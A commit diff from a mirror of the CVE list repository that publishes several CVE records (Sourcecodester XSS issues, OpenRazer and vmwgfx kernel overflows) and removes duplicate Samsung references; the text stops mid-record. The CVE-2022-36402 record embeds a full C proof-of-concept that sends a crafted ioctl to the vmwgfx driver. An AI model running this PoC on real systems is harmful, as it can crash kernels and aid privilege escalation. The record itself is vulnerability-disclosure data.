mirror of
https://github.com/CVEProject/cvelist.git
synced 2025-08-04 08:44:25 +00:00
"-Synchronized-Data."
This commit is contained in:
CVE Team
parent
40ac93ebfa
commit
07c1117b30
@ -1,17 +1,71 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2021-41731",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"ID": "CVE-2021-41731",
|
||||
"STATE": "PUBLIC"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "n/a",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_value": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Cross Site Scripting (XSS vulnerability exists in )Sourcecodester News247 News Magazine (CMS) PHP 5.6 or higher and MySQL 5.7 or higher via the blog category name field"
|
||||
}
|
||||
]
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"url": "https://www.sourcecodester.com",
|
||||
"refsource": "MISC",
|
||||
"name": "https://www.sourcecodester.com"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "http://packetstormsecurity.com/files/168384/News247-News-Magazine-1.0-Cross-Site-Scripting.html",
|
||||
"url": "http://packetstormsecurity.com/files/168384/News247-News-Magazine-1.0-Cross-Site-Scripting.html"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://cxsecurity.com/issue/WLB-2022090039",
|
||||
"url": "https://cxsecurity.com/issue/WLB-2022090039"
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@ -1,17 +1,66 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2021-42597",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"ID": "CVE-2021-42597",
|
||||
"STATE": "PUBLIC"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "n/a",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_value": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "A Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Storage Unit Rental Management System PHP 8.0.10 , Apache 2.4.14, SURMS V 1.0 via the Add New Tenant List Rent List form."
|
||||
}
|
||||
]
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"url": "https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html",
|
||||
"refsource": "MISC",
|
||||
"name": "https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://cxsecurity.com/issue/WLB-2022090036",
|
||||
"url": "https://cxsecurity.com/issue/WLB-2022090036"
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@ -34,7 +34,7 @@
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "A buffer overflow in the razerkbd driver of OpenRazer v3.3.0 and below allows attackers to cause a Denial of Service (DoS) via a crafted buffer sent to the matrix_custom_frame device."
|
||||
"value": "A buffer overflow vulnerability exists in the razerkbd driver of OpenRazer up to version v3.3.0 allows attackers to cause a Denial of Service (DoS) and possibly escalate their privileges via a crafted buffer sent to the matrix_custom_frame device."
|
||||
}
|
||||
]
|
||||
},
|
||||
@ -56,6 +56,11 @@
|
||||
"url": "https://github.com/openrazer/openrazer/pull/1790",
|
||||
"refsource": "MISC",
|
||||
"name": "https://github.com/openrazer/openrazer/pull/1790"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://www.cyberark.com/resources/threat-research-blog/colorful-vulnerabilities",
|
||||
"url": "https://www.cyberark.com/resources/threat-research-blog/colorful-vulnerabilities"
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@ -34,7 +34,7 @@
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "A buffer overflow in the razeraccessory driver of OpenRazer v3.3.0 and below allows attackers to cause a Denial of Service (DoS) via a crafted buffer sent to the matrix_custom_frame device."
|
||||
"value": "A buffer overflow vulnerability exists in the razeraccessory driver of OpenRazer up to version v3.3.0 allows attackers to cause a Denial of Service (DoS) and possibly escalate their privileges via a crafted buffer sent to the matrix_custom_frame device."
|
||||
}
|
||||
]
|
||||
},
|
||||
@ -56,6 +56,11 @@
|
||||
"url": "https://github.com/openrazer/openrazer/pull/1790",
|
||||
"refsource": "MISC",
|
||||
"name": "https://github.com/openrazer/openrazer/pull/1790"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://www.cyberark.com/resources/threat-research-blog/colorful-vulnerabilities",
|
||||
"url": "https://www.cyberark.com/resources/threat-research-blog/colorful-vulnerabilities"
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@ -34,7 +34,7 @@
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "A buffer overflow in the razermouse driver of OpenRazer v3.3.0 and below allows attackers to cause a Denial of Service (DoS) via a crafted buffer sent to the matrix_custom_frame device."
|
||||
"value": "A buffer overflow vulnerability exists in the razermouse driver of OpenRazer up to version v3.3.0 allows attackers to cause a Denial of Service (DoS) and possibly escalate their privileges via a crafted buffer sent to the matrix_custom_frame device."
|
||||
}
|
||||
]
|
||||
},
|
||||
@ -56,6 +56,11 @@
|
||||
"url": "https://github.com/openrazer/openrazer/pull/1790",
|
||||
"refsource": "MISC",
|
||||
"name": "https://github.com/openrazer/openrazer/pull/1790"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://www.cyberark.com/resources/threat-research-blog/colorful-vulnerabilities",
|
||||
"url": "https://www.cyberark.com/resources/threat-research-blog/colorful-vulnerabilities"
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -1,18 +1,104 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"AKA": "Anolis",
|
||||
"ASSIGNER": "security@openanolis.org",
|
||||
"DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
|
||||
"ID": "CVE-2022-36402",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"STATE": "PUBLIC",
|
||||
"TITLE": "There is an int overflow vulnerability in vmwgfx driver"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "kernel",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_affected": ">=",
|
||||
"version_name": "5.13.0-52",
|
||||
"version_value": "v4.3-rc1"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "Linux"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"credit": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
|
||||
}
|
||||
],
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
|
||||
}
|
||||
]
|
||||
},
|
||||
"exploit": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n\n#include <linux/if_tun.h>\n#include <net/if.h>\n#include <sys/ioctl.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <sys/socket.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/ioctl.h>\n#include <errno.h>\n#include <stdio.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdint.h>\n#include <netinet/ip.h>\n#include <sys/resource.h>\n#include <sys/syscall.h>\n#include <limits.h>\n#include <sys/mman.h>\n\n#include <linux/fs.h>\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n 0x2000,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n strerror(errno));\n }\n \n memset(vaddr,\"a\",0x2000); \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}"
|
||||
}
|
||||
],
|
||||
"generator": {
|
||||
"engine": "Vulnogram 0.0.9"
|
||||
},
|
||||
"impact": {
|
||||
"cvss": {
|
||||
"attackComplexity": "LOW",
|
||||
"attackVector": "NETWORK",
|
||||
"availabilityImpact": "HIGH",
|
||||
"baseScore": 6.3,
|
||||
"baseSeverity": "MEDIUM",
|
||||
"confidentialityImpact": "NONE",
|
||||
"integrityImpact": "LOW",
|
||||
"privilegesRequired": "LOW",
|
||||
"scope": "UNCHANGED",
|
||||
"userInteraction": "REQUIRED",
|
||||
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
|
||||
"version": "3.1"
|
||||
}
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "CWE-118 Incorrect Access of Indexable Resource ('Range Error')"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072",
|
||||
"name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
|
||||
}
|
||||
]
|
||||
},
|
||||
"source": {
|
||||
"defect": [
|
||||
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
|
||||
],
|
||||
"discovery": "INTERNAL"
|
||||
}
|
||||
}
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -70,11 +70,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=08"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=08",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -1,17 +1,71 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-37775",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"ID": "CVE-2022-37775",
|
||||
"STATE": "PUBLIC"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "n/a",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_value": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
